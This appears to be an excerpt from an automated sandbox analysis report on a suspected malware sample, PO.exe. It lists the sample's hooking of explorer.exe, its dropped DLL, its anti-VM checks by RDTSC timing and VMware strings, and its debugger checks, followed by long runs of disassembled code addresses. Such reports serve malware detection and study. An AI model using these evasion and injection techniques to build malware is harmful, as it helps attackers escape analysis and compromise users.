          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A8D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CFD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AD085 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AD0DB push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AD0D2 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AB828 push cs; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AD13C push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008A8292 pushad ; retf
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008A7C74 push ds; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AE638 pushad ; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008A6740 push FFFFFF87h; retf
          Source: C:\Users\user\Desktop\PO.exeFile created: C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xEB
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000008998E4 second address: 00000000008998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000000899B5E second address: 0000000000899B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 1260Thread sleep time: -58000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 6136Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000003.00000000.259578137.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000002.503553523.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.259320377.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000002.503675832.0000000003755000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000002.503705754.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000002.503675832.0000000003755000.00000004.00000001.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.245750611.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000003.00000000.259630754.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000003.00000000.255125796.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000003.00000000.259320377.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.259320377.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.259630754.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000003.00000000.259320377.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PO.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_73351000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0250165A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_02501872 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A39080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00ACB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A5C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A62990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AC41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A54120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A62AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A62ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A74A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A74A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A48A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A35210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A53A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AC4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A64BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B05BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A62397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A5DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A63B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A63B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B08B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A5746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00ACC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00ACC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AE8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
